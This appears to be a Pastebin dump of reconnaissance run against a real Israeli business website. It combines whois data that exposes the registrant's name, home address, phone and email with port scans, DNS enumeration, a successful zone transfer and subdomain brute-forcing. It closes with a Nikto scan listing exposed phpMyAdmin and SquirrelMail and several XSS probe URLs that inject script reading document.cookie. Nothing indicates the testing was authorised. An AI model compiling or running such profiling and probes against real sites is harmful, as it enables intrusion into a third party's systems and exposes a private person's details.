Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname babylon-woodline.co.il ISP 013 NetVision Ltd
- Continent Asia Flag
- IL
- Country Israel Country Code IL
- Region Unknown Local time 23 Jan 2019 11:15 IST
- City Unknown Postal Code Unknown
- IP Address 62.90.134.182 Latitude 31.5
- #######################################################################################################################################
- > babylon-woodline.co.il
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- Name: babylon-woodline.co.il
- Address: 62.90.134.182
- >
- #######################################################################################################################################
- HostIP:62.90.134.182
- HostName:babylon-woodline.co.il
- Gathered Inet-whois information for 62.90.134.182
- --------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 62.90.0.0 - 62.90.255.255
- netname: IL-NETVISION-20000801
- country: IL
- org: ORG-NL5-RIPE
- admin-c: NVAD-RIPE
- tech-c: NVAD-RIPE
- status: ALLOCATED PA
- mnt-by: RIPE-NCC-HM-MNT
- mnt-by: NV-MNT-RIPE
- mnt-lower: NV-MNT-RIPE
- mnt-routes: NV-MNT-RIPE
- created: 2001-12-17T10:50:31Z
- last-modified: 2016-08-24T11:01:56Z
- source: RIPE # Filtered
- organisation: ORG-NL5-RIPE
- org-name: 013 NetVision Ltd
- org-type: LIR
- address: 10 Hagavish st.
- address: 4250708
- address: Netanya
- address: ISRAEL
- phone: +972529989933
- fax-no: +97248550454
- abuse-c: AR15573-RIPE
- mnt-ref: RIPE-NCC-HM-MNT
- mnt-ref: NV-MNT-RIPE
- mnt-by: RIPE-NCC-HM-MNT
- mnt-by: NV-MNT-RIPE
- created: 2004-04-17T11:27:52Z
- last-modified: 2018-12-19T10:42:36Z
- source: RIPE # Filtered
- person: Ripe Admin - 013 Netvision
- address: Matam, Haifa
- address: Israel
- phone: +972-4-8560454
- nic-hdl: NVAD-RIPE
- created: 2009-10-13T07:36:13Z
- last-modified: 2017-10-30T22:07:16Z
- source: RIPE # Filtered
- mnt-by: NV-MNT-RIPE
- % Information related to '62.90.0.0/16AS1680'
- route: 62.90.0.0/16
- descr: 013 Netvision Network
- origin: AS1680
- mnt-by: NV-MNT-RIPE
- created: 2009-03-26T10:21:42Z
- last-modified: 2009-03-26T10:21:42Z
- source: RIPE
- % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
- Gathered Inic-whois information for babylon-woodline.co.il
- ---------------------------------------------------------------------------------------------------------------------------------------
- domain: babylon-woodline.co.il
- descr: daniel ovadia
- descr: mezada 3
- descr: hodhasron
- descr: 4529414
- descr: Israel
- phone: +972 2 2601060
- e-mail: web4id AT gmail.com
- admin-c: GI-DO2301-IL
- tech-c: GI-DO2301-IL
- zone-c: GI-DO2301-IL
- nserver: ns1.webid.co.il
- nserver: ns2.webid.co.il
- validity: 19-08-2019
- DNSSEC: unsigned
- status: Transfer Locked
- changed: domain-registrar AT isoc.org.il 20180819 (Assigned)
- person: daniel ovadia
- address mezada 3
- address hod hasron
- address 4529414
- address Israel
- phone: +972 2 2601060
- e-mail: web4id AT gmail.com
- nic-hdl: GI-DO2301-IL
- changed: domain-registrar AT isoc.org.il 20180819
- registrar name: Gorni Interactive Ltd
- registrar info: http://www.box.co.il/
- % Rights to the data above are restricted by copyright.
- Gathered Netcraft information for babylon-woodline.co.il
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for babylon-woodline.co.il
- Netcraft.com Information gathered
- Gathered Subdomain information for babylon-woodline.co.il
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host babylon-woodline.co.il, Searched 0 pages containing 0 results
- Gathered E-Mail information for babylon-woodline.co.il
- --------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host babylon-woodline.co.il, Searched 0 pages containing 0 results
- Gathered TCP Port information for 62.90.134.182
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 53/tcp open
- 80/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 143 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://babylon-woodline.co.il
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: מזרונים ליין
- [+] IP address: 62.90.134.182
- [+] Web Server: Could Not Detect
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Allow: /
- -----------[end of contents]-------------
- W H O I S L O O K U P
- =======================================================================================================================================
- % The data in the WHOIS database of the .il registry is provided
- % by ISOC-IL for information purposes, and to assist persons in
- % obtaining information about or related to a domain name
- % registration record. ISOC-IL does not guarantee its accuracy.
- % By submitting a WHOIS query, you agree that you will use this
- % Data only for lawful purposes and that, under no circumstances
- % will you use this Data to: (1) allow, enable, or otherwise
- % support the transmission of mass unsolicited, commercial
- % advertising or solicitations via e-mail (spam);
- % or (2) enable high volume, automated, electronic processes that
- % apply to ISOC-IL (or its systems).
- % ISOC-IL reserves the right to modify these terms at any time.
- % By submitting this query, you agree to abide by this policy.
- query: babylon-woodline.co.il
- reg-name: babylon-woodline
- domain: babylon-woodline.co.il
- descr: daniel ovadia
- descr: mezada 3
- descr: hodhasron
- descr: 4529414
- descr: Israel
- phone: +972 2 2601060
- e-mail: web4id AT gmail.com
- admin-c: GI-DO2301-IL
- tech-c: GI-DO2301-IL
- zone-c: GI-DO2301-IL
- nserver: ns1.webid.co.il
- nserver: ns2.webid.co.il
- validity: 19-08-2019
- DNSSEC: unsigned
- status: Transfer Locked
- changed: domain-registrar AT isoc.org.il 20180819 (Assigned)
- person: daniel ovadia
- address mezada 3
- address hod hasron
- address 4529414
- address Israel
- phone: +972 2 2601060
- e-mail: web4id AT gmail.com
- nic-hdl: GI-DO2301-IL
- changed: domain-registrar AT isoc.org.il 20180819
- registrar name: Gorni Interactive Ltd
- registrar info: http://www.box.co.il/
- % Rights to the data above are restricted by copyright.
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 62.90.134.182
- [i] Country: Israel
- [i] State:
- [i] City:
- [i] Latitude: 31.5
- [i] Longitude: 34.75
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 301 Moved Permanently
- [i] Date: Wed, 23 Jan 2019 09:21:56 GMT
- [i] Content-Type: text/html; charset=utf-8
- [i] Content-Length: 0
- [i] Location: /index.1.html
- [i] Vary: User-Agent
- [i] Connection: close
- [i] HTTP/1.1 200 OK
- [i] Date: Wed, 23 Jan 2019 09:21:57 GMT
- [i] Content-Type: text/html; charset=utf-8
- [i] Vary: Accept-Encoding,User-Agent
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- babylon-woodline.co.il. 14399 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
- babylon-woodline.co.il. 14399 IN MX 10 mail.babylon-woodline.co.il.
- babylon-woodline.co.il. 14399 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
- babylon-woodline.co.il. 14399 IN NS ns2.webid.co.il.
- babylon-woodline.co.il. 14399 IN NS ns1.webid.co.il.
- babylon-woodline.co.il. 14399 IN A 62.90.134.182
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 62.90.134.182
- Network = 62.90.134.182 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 62.90.134.182 - 62.90.134.182 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2019-01-23 09:21 UTC
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.13s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp filtered ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
- S U B - D O M A I N F I N D E R
- ========================================================================================================================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: www.babylon-woodline.co.il
- [-] IP: 62.90.134.182
- #######################################################################################################################################
- [?] Enter the target: example( http://domain.com )
- http://babylon-woodline.co.il/index.1.html
- [!] IP Address : 62.90.134.182
- [!] babylon-woodline.co.il doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for babylon-woodline.co.il
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/babylon-woodline.co.il
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp filtered ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns1.webid.co.il. (62.90.134.182) AS1680 013 NetVision Ltd Israel
- ns2.webid.co.il. (212.150.246.99) AS1680 013 NetVision Ltd Israel
- [+] MX Records
- 10 (62.90.134.182) AS1680 013 NetVision Ltd Israel
- [+] Host Records (A)
- mail.babylon-woodline.co.ilHTTP: (server.webid.co.il) (62.90.134.182) AS1680 013 NetVision Ltd Israel
- www.babylon-woodline.co.ilHTTP: (server.webid.co.il) (62.90.134.182) AS1680 013 NetVision Ltd Israel
- [+] TXT Records
- "v=spf1 a mx ip4:62.90.134.182 ~all"
- [+] DNS Map: https://dnsdumpster.com/static/map/babylon-woodline.co.il.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 62.90.134.182:www.babylon-woodline.co.il
- [+] Virtual hosts:
- --------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- <<>> DiG 9.11.5-P1-1-Debian <<>> babylon-woodline.co.il
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9587
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;babylon-woodline.co.il. IN A
- ;; ANSWER SECTION:
- babylon-woodline.co.il. 13270 IN A 62.90.134.182
- ;; Query time: 195 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: mer jan 23 04:33:35 EST 2019
- ;; MSG SIZE rcvd: 67
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace babylon-woodline.co.il
- ;; global options: +cmd
- . 79459 IN NS d.root-servers.net.
- . 79459 IN NS i.root-servers.net.
- . 79459 IN NS h.root-servers.net.
- . 79459 IN NS e.root-servers.net.
- . 79459 IN NS l.root-servers.net.
- . 79459 IN NS b.root-servers.net.
- . 79459 IN NS g.root-servers.net.
- . 79459 IN NS f.root-servers.net.
- . 79459 IN NS j.root-servers.net.
- . 79459 IN NS m.root-servers.net.
- . 79459 IN NS k.root-servers.net.
- . 79459 IN NS a.root-servers.net.
- . 79459 IN NS c.root-servers.net.
- . 79459 IN RRSIG NS 8 0 518400 20190205050000 20190123040000 16749 . BjuPr9Wtn9W9+vjQuS+mCRtw0GlXadQUTZqWzyZaC3F69/qrZtLxkRDe u4CfiNpk+6Fr3WMHjEKjYCsXzZCnSjzS76IJSxNr5PPAIwkZ7qhoGcTi jQTCL0BBrNJa7FD29nPJ/pr3ljArReL3k4Gi/h/d1AJdOYNz5eXFzcRI l4YrdXsG6gMY3JmksoE/EDh9vp+BYwga3ZMv72ptER/BYcr2KqCKYK3V QMlr+kvO+s32m93OAOaqrtfBQZAAt0lqwGtU+tv0H0arV1LzcR6VZ3Yw XlHG1B6MybqD4BsXJOhyAEBq5e9TkjQcsz475DWKobsGTbFzK4MnKVC6 pPkqjg==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 193 ms
- il. 172800 IN NS lookup.iucc.ac.il.
- il. 172800 IN NS ns2.ns.il.
- il. 172800 IN NS ns3.ns.il.
- il. 172800 IN NS nsa.ns.il.
- il. 172800 IN NS nsb.ns.il.
- il. 172800 IN NS nse.ns.il.
- il. 172800 IN NS ilns.ilan.net.il.
- il. 172800 IN NS ns1.ns.il.
- il. 172800 IN NS sns-pb.isc.org.
- il. 86400 IN DS 44729 8 2 7FA5A2FD091C340D4A01864B4F82D66D0769F3D3A0A1C48F8ABD2A64 B1689921
- il. 86400 IN RRSIG DS 8 1 86400 20190205050000 20190123040000 16749 . SQOU99Bum6R/ILTSFLCF9NuR8m8hX0LaLDWcYPRhbjJ91HXADNIuLyAu E/6tzXAjXOLtEkHUFglopUAZ4bSl7CKaRilthsWiXwOipsRtfBqzjUWx THK1gJtOi+CIaZ5dOLvw5mrK/ks5V9vHL64nctmtl4aiPHEMS2SvmslH O0ekd1U5Urcvb0Q14R9OloM5+q86XLXEM51NESFLG040/HSbviWnj68i MT3jaC3J+GUmV9s218eYrAc7VfhPeU4xr7s4g+gmtxDc7zxlIBd4TFRg 6UsATmDjSMCrWnryhQIth+9V5j2LMw6MUpo0PskaEpACIZsC+bfzMelI 0LruNg==
- ;; Received 866 bytes from 2001:500:a8::e#53(e.root-servers.net) in 27 ms
- babylon-woodline.co.il. 86400 IN NS ns1.webid.co.il.
- babylon-woodline.co.il. 86400 IN NS ns2.webid.co.il.
- i4ng30e6ho1oogjus9gnuf4ho8qjr729.co.il. 86400 IN NSEC3 1 1 10 7CE12AF346933CF2 I808NA34LO7Q55K3FAOBFSHSVU39TF9J NS SOA RRSIG DNSKEY NSEC3PARAM
- i4ng30e6ho1oogjus9gnuf4ho8qjr729.co.il. 86400 IN RRSIG NSEC3 8 3 86400 20190223080907 20190123070907 7233 co.il. Ygz6zcCwHg8HGE8yIWZcrQ/krSkly54AKHIpxi8COxDQCVo6IuhHw7VU nZhYZ9NJebX4BrnBmYUKTUBnnXDYsXM9CZafaO+5r5QrKLJGd7rSUrSh Gh1FFVjIqBiQhSS8lT/nrVdxMI85R/5wxe288XIf9QhEZDojT9+d8FQf OMG1Qy/khCWia02SNC4/Sgr5t4PqriIb9ItOD858JaCZBZ9pkR/XU1NM mwU/6jw+sabF17i35QuWHct0ZKW9ERrFfRO9s8NeniuNYrKcuTlH6EUl Hk6X1+GWEzkU3vZu5LgayNLMuUTSH6b9dlQJlaWVZvNO933vC0ipic5h x4pmHA==
- 9bpjm4r164qdueicm4kbr4kanmot6n7s.co.il. 86400 IN NSEC3 1 1 10 7CE12AF346933CF2 C2FULIBVA4GGAM91K16PHT5CA62MJPF3 NS DS RRSIG
- 9bpjm4r164qdueicm4kbr4kanmot6n7s.co.il. 86400 IN RRSIG NSEC3 8 3 86400 20190223080907 20190123070907 7233 co.il. aR3RlfUG9KMhJ2R9LDiouTDywVUd/8gfXuVSgJxPZqe9hxfzuIAA78n7 sfj/KdaA5JA4as9IjtDc/89lr8aHsm4tWz+HkGnm104Q8ewbg9W/a8ib 0A1ZRCQrfkeDYVvfAAwcbjO4XTggXyzpU426hsePRmUz6y9gb07jswkp mALq3pMV05mb+YqJEgmG7koxXRX80H30/9UdMF+C8nrTVyPqCrEA7ErW eBpEnvnLyz4hmjSlt4DijBNp4TOolc+7cMOtOcxymJFO48aZSbVBRBR9 p5vYQy6paIqJE7hDQ19KVllQe3XNox/PmOi7Lhc9ohuT7gGorRT1gfhG Fiwj2A==
- ;; Received 914 bytes from 2001:678:e:103::53#53(ns3.ns.il) in 76 ms
- babylon-woodline.co.il. 14400 IN A 62.90.134.182
- babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
- babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
- ;; Received 141 bytes from 212.150.246.99#53(ns2.webid.co.il) in 231 ms
- ######################################################################################################################################
- [*] Performing General Enumeration of Domain: babylon-woodline.co.il
- [-] DNSSEC is not configured for babylon-woodline.co.il
- [*] SOA ns1.webid.co.il 62.90.134.182
- [*] NS ns2.webid.co.il 212.150.246.99
- [*] Bind Version for 212.150.246.99 9.9.4-RedHat-9.9.4-61.el7
- [*] NS ns1.webid.co.il 62.90.134.182
- [*] Bind Version for 62.90.134.182 9.9.4-RedHat-9.9.4-61.el7
- [*] MX mail.babylon-woodline.co.il 62.90.134.182
- [*] A babylon-woodline.co.il 62.90.134.182
- [*] TXT babylon-woodline.co.il v=spf1 a mx ip4:62.90.134.182 ~all
- [*] TXT _domainkey.babylon-woodline.co.il o=~
- [*] Enumerating SRV Records
- [-] No SRV Records Found for babylon-woodline.co.il
- [+] 0 Records Found
- #######################################################################################################################################
- Traceroute 'babylon-woodline.co.il'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Start: 2019-01-23T09:36:47+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 0.8 0.8 0.7 0.9 0.1
- 2.|-- 45.79.12.6 0.0% 3 0.4 1.2 0.4 2.2 0.9
- 3.|-- dls-b22-link.telia.net 0.0% 3 2.9 1.9 0.8 2.9 1.0
- 4.|-- atl-b22-link.telia.net 0.0% 3 18.6 18.6 18.6 18.6 0.0
- 5.|-- ash-bb4-link.telia.net 0.0% 3 45.4 48.0 45.4 50.8 2.7
- 6.|-- prs-bb3-link.telia.net 0.0% 3 140.8 140.7 140.4 140.8 0.2
- 7.|-- ldn-bb3-link.telia.net 0.0% 3 126.4 126.9 125.7 128.7 1.6
- 8.|-- ldn-b4-link.telia.net 0.0% 3 126.4 128.1 126.4 130.4 2.1
- 9.|-- ldn-bb4-link.telia.net 33.3% 3 129.4 127.6 125.8 129.4 2.5
- 10.|-- ldn-b4-link.telia.net 0.0% 3 125.7 126.1 125.7 127.0 0.7
- 11.|-- netvision-ic-304535.c.telia.net 0.0% 3 124.5 125.1 124.5 125.8 0.6
- 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 13.|-- gw2-2-0-5-hfa-gw2-lnd.nv.net.il 0.0% 3 194.8 195.3 194.8 196.1 0.7
- 14.|-- core1-0-1-0-2-gw2.hfa.nv.net.il 0.0% 3 193.1 192.3 191.8 193.1 0.7
- 15.|-- core1-rha2-0-0-core1-hfa.nv.net.il 0.0% 3 191.0 190.8 190.4 191.0 0.4
- 16.|-- po221.srvc3.rha.nv.net.il 0.0% 3 192.5 193.6 192.5 194.6 1.0
- 17.|-- 82-166-37-254.barak-online.net 0.0% 3 199.7 199.1 196.8 200.7 2.0
- 18.|-- 62-90-134-178.barak.net.il 0.0% 3 196.6 196.9 196.6 197.2 0.3
- 19.|-- server.webid.co.il 0.0% 3 218.0 215.0 213.3 218.0 2.6
- #######################################################################################################################################
- [*] Processing domain babylon-woodline.co.il
- [*] Using system resolvers ['194.187.251.67', '185.93.180.131', '83.143.245.42', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
- [+] Getting nameservers
- 212.150.246.99 - ns2.webid.co.il
- [+] Zone transfer sucessful using nameserver ns2.webid.co.il
- babylon-woodline.co.il. 14400 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
- babylon-woodline.co.il. 14400 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
- babylon-woodline.co.il. 14400 IN MX 10 mail.babylon-woodline.co.il.
- babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
- babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
- babylon-woodline.co.il. 14400 IN A 62.90.134.182
- _domainkey.babylon-woodline.co.il. 14400 IN TXT "o=~"
- x._domainkey.babylon-woodline.co.il. 14400 IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnPngW+NT8sgdpBM2YWoyLd7AkZ0vpm6fgtyACNiOhtVCvGy+KE1IoShdqPcCDt3G6L5pa6gJo9kfxkX4bO1niE8" "dGIirGFgqy4dixwIZ1FYBEOLzND9S+Izh5G6NOkq22FcrTwPIfTTDnZTsR7UhuQMtXa4EflM43kXjBaM/l1tIXW3kuCOnW3kzm8d00KJZYdM4CWFOSiQyvg1wrjaI+VYuMY1Io4V3ytpscEjb1kJo1" "JKDWhek+ZIuGim5sDv18a16Ho7/OnGUctWL00MDQ3cqm4w0bqI1fnjAI+v2R/OpHmZPXL1ddJRlSSLspnqgionlZ+FBO5DLPBkhrttJ8QIDAQAB"
- ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- #######################################################################################################################################
- Port État Service
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2000/tcp open cisco-sccp
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 5060/tcp open sip
- 8080/tcp open http-proxy
- 8081/tcp open blackice-icecap
- #######################################################################################################################################
- Source TTL Type d'adresse Type d'enregistrement Résolution
- babylon-woodline.co.il. 14400 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
- babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
- babylon-woodline.co.il. 14400 IN A 62.90.134.182
- babylon-woodline.co.il. 14400 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
- babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
- babylon-woodline.co.il. 14400 IN MX mail.babylon-woodline.co.il. (10)
- #######################################################################################################################################
- "www.babylon-woodline.co.il",
- "ftp.babylon-woodline.co.il",
- "pop.babylon-woodline.co.il",
- "smtp.babylon-woodline.co.il",
- "x._domainkey.babylon-woodline.co.il",
- "mail.babylon-woodline.co.il",
- "_domainkey.babylon-woodline.co.il"
- ]
- + resolving target: YES
- - scaning for subdomain...
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 62.90.134.182 200 host ftp.babylon-woodline.co.il nginx
- 62.90.134.182 200 host mail.babylon-woodline.co.il nginx
- 62.90.134.182 200 host pop.babylon-woodline.co.il nginx
- 62.90.134.182 200 host smtp.babylon-woodline.co.il nginx
- 62.90.134.182 301 host www.babylon-woodline.co.il nginx
- #######################################################################################################################################
- [+] Testing domain
- www.babylon-woodline.co.il 62.90.134.182
- [+] Dns resolving
- Domain name Ip address Name server
- babylon-woodline.co.il 62.90.134.182 server.webid.co.il
- Found 1 host(s) for babylon-woodline.co.il
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on babylon-woodline.co.il
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 127.8 seconds
- Subdomain Ip address Name server
- ftp.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
- mail.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
- pop.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
- smtp.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
- www.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
- #######################################################################################################################################
- =======================================================================================================================================
- | E-mails:
- | [+] E-mail Found: mike@hyperreal.org
- | [+] E-mail Found: webmaster@babylon-woodline.co.il
- | [+] E-mail Found: humbedooh@apache.org
- | [+] E-mail Found: kevinh@kevcom.com
- =======================================================================================================================================
- | External hosts:
- | [+] External Host Found: http://httpd.apache.org
- | [+] External Host Found: http://html5shiv.googlecode.com
- =======================================================================================================================================
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 62.90.134.182
- + Target Hostname: 62.90.134.182
- + Target Port: 443
- --------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
- Ciphers: ECDHE-RSA-AES128-GCM-SHA256
- Issuer: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
- + Start Time: 2019-01-23 04:21:17 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx
- + Server leaks inodes via ETags, header found with file /, fields: 0x2b 0x56ee9136e8a00
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-accel-version' found, with contents: 0.01
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + Hostname '62.90.134.182' does not match certificate's names: localhost
- + Uncommon header 'x-ob_mode' found, with contents: 1
- + Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
- + Uncommon header 'referrer-policy' found, with contents: no-referrer
- + Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
- + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + Cookie SQMSESSID created without the secure flag
- + Cookie SQMSESSID created without the httponly flag
- + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
- + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- ---------------------------------------------------------------------------------------------------------------------------------------
- ######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 62.90.134.182
- + Target Hostname: babylon-woodline.co.il
- + Target Port: 80
- + Start Time: 2019-01-23 04:21:22 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
- + Multiple index files found: /index.1.html/index.do, /index.1.html/index.asp, /index.1.html/index.cfm, /index.1.html/index.shtml, /index.1.html/index.php, /index.1.html/index.htm, /index.1.html/index.xml, /index.1.html/index.php3, /index.1.html/index.jhtml, /index.1.html/index.cgi, /index.1.html/index.pl, /index.1.html/index.aspx
- + Server banner has changed from '' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
- + OSVDB-7501: /index.1.html/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7505: /index.1.html/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7504: /index.1.html/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7503: /index.1.html/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7495: /index.1.html/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7498: /index.1.html/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7499: /index.1.html/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7497: /index.1.html/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-7496: /index.1.html/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
